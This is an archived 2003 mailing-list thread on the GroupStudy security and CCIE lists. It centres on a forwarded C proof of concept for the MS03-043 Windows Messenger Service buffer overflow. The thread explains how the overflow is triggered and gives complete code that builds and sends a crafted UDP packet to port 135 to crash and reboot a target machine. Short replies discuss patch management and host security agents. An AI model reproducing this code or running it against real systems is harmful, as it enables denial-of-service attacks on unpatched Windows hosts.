From: Wright, Jeremy (wright@admworld.com)
Date: Wed Oct 22 2003 - 09:34:07 GMT-3
This was considered and recommended by me but was not given the green light by management. I guess they still don't see that the cost of desktop agents/patch management is much less than the cost of down time due to virus/worm propagation especially in an environment as large as mine. The code I sent is what I used to prove to my boss that the exploit is not that tough to hack. I received the code from another security list and passed it on to hopefully help someone in a similar situation as mine. Thanks
-----Original Message-----
From: Peter [mailto:peter@cyscoexpert.com]
Sent: Tuesday, October 21, 2003 10:02 PM
To: security@groupstudy.com
Cc: ccielab@groupstudy.com
Subject: Re: Attack the MS043 vulnerability
Rather think of Cisco Security Agent for all the desktops and servers.
_____________________________
Peter
#7247 (R&S, Security, SP)
CyscoExpert Corp.
4433 W. Touhy Ave. Suite 410
Lincolnwood, IL 60712
Phone (847) 674-3392
Toll Free (866) CyscoXP (297-2697)
Fax (847) 674-2625
----- Original Message -----
From: "Wright, Jeremy" <wright@admworld.com>
To: "'Brian McGahan '" <bmcgahan@internetworkexpert.com>; "Wright, Jeremy"
<wright@admworld.com>; <security@groupstudy.com>
Cc: <ccielab@groupstudy.com>
Sent: Tuesday, October 21, 2003 9:52 PM
Subject: RE: Attack the MS043 vulnerability
> Yes, and to let upper management understand the importance of patch
management instead of having interns running around like crazy every other
week :)
>
> -----Original Message-----
> From: Brian McGahan
> To: 'Wright, Jeremy'; security@groupstudy.com
> Cc: ccielab@groupstudy.com
> Sent: 10/21/2003 8:23 PM
> Subject: RE: Attack the MS043 vulnerability
>
> Jeremy,
>
> The code sample I'm assuming is for educational and research
> purposes only, right? :)
>
> Brian McGahan, CCIE #8593
> bmcgahan@internetworkexpert.com
>
> Internetwork Expert, Inc.
> http://www.InternetworkExpert.com
> Toll Free: 877-224-8987
> Direct: 708-362-1418 (Outside the US and Canada)
>
>
> > -----Original Message-----
> > From: nobody@groupstudy.com [mailto:nobody@groupstudy.com] On Behalf
> Of
> > Wright, Jeremy
> > Sent: Tuesday, October 21, 2003 8:13 PM
> > To: 'security@groupstudy.com'
> > Cc: 'ccielab@groupstudy.com'
> > Subject: OT:Attack the MS043 vulnerability
> >
> > DoS Proof of Concept for MS03-043 - exploitation shouldn't be too
> hard.
> > Launching it one or two times against the target should make the
> machine
> > reboot. Tested against a Win2K SP4.
> >
> > "The vulnerability results because the Messenger Service does not
> properly
> > validate the length of a message before passing it to the allocated
> > buffer"
> > according to MS bulletin. Digging into it a bit more, we find that
> when a
> > character 0x14 in encountered in the 'body' part of the message, it is
> > replaced
> > by a CR+LF. The buffer allocated for this operation is twice the size
> of
> > the
> > string, which is the way to go, but is then copied to a buffer which
> was
> > only
> > allocated 11CAh bytes. Thanks to that, we can bypass the length checks
> and
> > overflow the fixed size buffer.
> >
> > Credits go to LSD :)
> >
> > */
> >
> > #include <stdio.h>
> > #include <winsock.h>
> > #include <string.h>
> > #include <time.h>
> >
> > // Packet format found thanks to a bit a sniffing
> > static unsigned char packet_header[] =
> > "\x04\x00\x28\x00"
> > "\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
> > "\x4f\xb6\xe6\xfc"
> > "\xff\xff\xff\xff" // @40 : unique id over 16 bytes ?
> > "\xff\xff\xff\xff"
> > "\xff\xff\xff\xff"
> > "\xff\xff\xff\xff"
> > "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
> > "\x00\x00\xff\xff\xff\xff"
> > "\xff\xff\xff\xff" // @74 : fields length
> > "\x00\x00";
> >
> > unsigned char field_header[] =
> > "\xff\xff\xff\xff" // @0 : field length
> > "\x00\x00\x00\x00"
> > "\xff\xff\xff\xff"; // @8 : field length
> >
> > int main(int argc,char *argv[])
> > {
> > int i, packet_size, fields_size, s;
> > unsigned char packet[8192];
> > struct sockaddr_in addr;
> > // A few conditions :
> > // 0 <= strlen(from) + strlen(machine) <= 56
> > // max fields size 3992
> > char from[] = "RECCA";
> > char machine[] = "ZEUS";
> > char body[4096] = "*** MESSAGE ***";
> >
> > WSADATA wsaData;
> >
> > WSAStartup(0x0202, &wsaData);
> >
> > ZeroMemory(&addr, sizeof(addr));
> > addr.sin_family = AF_INET;
> > addr.sin_addr.s_addr = inet_addr("192.168.186.3");
> > addr.sin_port = htons(135);
> >
> > ZeroMemory(packet, sizeof(packet));
> > packet_size = 0;
> >
> > memcpy(&packet[packet_size], packet_header,
> sizeof(packet_header)
> > - 1);
> > packet_size += sizeof(packet_header) - 1;
> >
> > i = strlen(from) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], from);
> > packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a
> multiple
> > of 4
> >
> > i = strlen(machine) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], machine);
> > packet_size += (((i - 1) >> 2) + 1) << 2; // padded to a
> multiple
> > of 4
> >
> > fprintf(stdout, "Max 'body' size (incl. terminal NULL char) =
> > %d\n", 3992 - packet_size + sizeof(packet_header) -
> sizeof(field_header));
> >
> > memset(body, 0x14, sizeof(body));
> > body[3992 - packet_size + sizeof(packet_header) -
> > sizeof(field_header) - 1] = '\0';
> >
> > i = strlen(body) + 1;
> > *(unsigned int *)(&field_header[0]) = i;
> > *(unsigned int *)(&field_header[8]) = i;
> > memcpy(&packet[packet_size], field_header,
> sizeof(field_header) -
> > 1);
> > packet_size += sizeof(field_header) - 1;
> > strcpy(&packet[packet_size], body);
> > packet_size += i;
> >
> > fields_size = packet_size - (sizeof(packet_header) - 1);
> > *(unsigned int *)(&packet[40]) = time(NULL);
> > *(unsigned int *)(&packet[74]) = fields_size;
> >
> > fprintf(stdout, "Total length of strings = %d\nPacket size =
> > %d\nFields size = %d\n", strlen(from) + strlen(machine) +
> strlen(body),
> > packet_size, fields_size);
> >
> > /*
> > for (i = 0; i < packet_size; i++)
> > {
> > if (i && ((i & 1) == 0))
> > fprintf(stdout, " ");
> > if (i && ((i & 15) == 0))
> > fprintf(stdout, "\n");
> > fprintf(stdout, "%02x", packet[i]);
> > }
> > fprintf(stdout, "\n");
> > */
> > if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
> > exit(EXIT_FAILURE);
> >
> > if (sendto(s, packet, packet_size, 0, (struct sockaddr
> *)&addr,
> > sizeof(addr)) == -1)
> > exit(EXIT_FAILURE);
> > /*
> > if (recvfrom(s, packet, sizeof(packet) - 1, 0, NULL, NULL) ==
> -1)
> > exit(EXIT_FAILURE);
> > */
> >
> > exit(EXIT_SUCCESS);
> > }
> >
> >
> > CONFIDENTIALITY NOTICE:
> > This message is intended for the use of the individual or entity
> to
> > which it is addressed and may contain information that is privileged,
> > confidential and exempt from disclosure under applicable law. If the
> > reader of this message is not the intended recipient or the employee
> or
> > agent responsible for delivering this message to the intended
> recipient,
> > you are hereby notified that any dissemination, distribution or
> copying of
> > this communication is strictly prohibited.
> > If you have received this communication in error, please notify
> us
> > immediately by email reply or by telephone and immediately delete this
> > message and any attachments. In the U.S. call us toll free at (800)
> 637-
> > 5843.
> > Spanish, French, Quebecois French, Portuguese, Polish, German,
> > Dutch, Turkish, Russian, Japanese and Chinese:
> > http://www.admworld.com/confidentiality.htm.
> >
> >
> _______________________________________________________________________
> > Please help support GroupStudy by purchasing your study materials
> from:
> > http://shop.groupstudy.com
> >
> > Subscription information may be found at:
> > http://www.groupstudy.com/list/CCIELab.html
>
>
> CONFIDENTIALITY NOTICE:
> This message is intended for the use of the individual or entity to which
it is addressed and may contain information that is privileged, confidential
and exempt from disclosure under applicable law. If the reader of this
message is not the intended recipient or the employee or agent responsible
for delivering this message to the intended recipient, you are hereby
notified that any dissemination, distribution or copying of this
communication is strictly prohibited.
> If you have received this communication in error, please notify us
immediately by email reply or by telephone and immediately delete this
message and any attachments. In the U.S. call us toll free at (800)
637-5843.
> Spanish, French, Quebecois French, Portuguese, Polish, German, Dutch,
Turkish, Russian, Japanese and Chinese:
http://www.admworld.com/confidentiality.htm.
>
> _______________________________________________________________________
> Please help support GroupStudy by purchasing your study materials from:
> http://shop.groupstudy.com
>
> Subscription information may be found at:
> http://www.groupstudy.com/list/CCIELab.html
This archive was generated by hypermail 2.1.4 : Mon Nov 24 2003 - 07:53:06 GMT-3